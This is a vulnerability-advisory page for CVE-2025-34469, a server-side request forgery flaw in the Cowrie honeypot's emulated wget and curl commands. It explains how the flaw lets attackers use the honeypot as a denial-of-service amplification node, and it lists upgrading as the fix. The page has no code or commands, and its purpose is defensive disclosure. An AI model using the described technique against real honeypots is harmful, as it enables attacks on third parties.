CVE-2025-34469
SSRF in Cowrie wget/curl Enables DoS Amplification Abuse
Publication date: 2025-12-31
Last updated on: 2025-12-31
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cowrie | cowrie | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a server-side request forgery (SSRF) in Cowrie versions prior to 2.9.0. It occurs in the emulated shell implementation of wget and curl commands, which perform real outbound HTTP requests to attacker-supplied destinations without rate limiting. This allows unauthenticated remote attackers to repeatedly invoke these commands to generate unlimited HTTP traffic toward arbitrary third-party targets, abusing the Cowrie honeypot as a denial-of-service amplification node and hiding the attacker's true source IP behind the honeypot's IP.
How can this vulnerability impact me? :
The vulnerability can be exploited by attackers to generate unbounded HTTP traffic toward arbitrary third-party targets, effectively using the Cowrie honeypot as a denial-of-service amplification node. This can lead to denial-of-service attacks on third parties and can mask the attacker's true source address by hiding it behind the honeypot's IP address.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade Cowrie to version 2.9.0 or later where the SSRF issue in the emulated wget and curl commands is fixed. Additionally, consider implementing outbound request rate limiting and monitoring outbound HTTP traffic from the honeypot to detect and prevent abuse.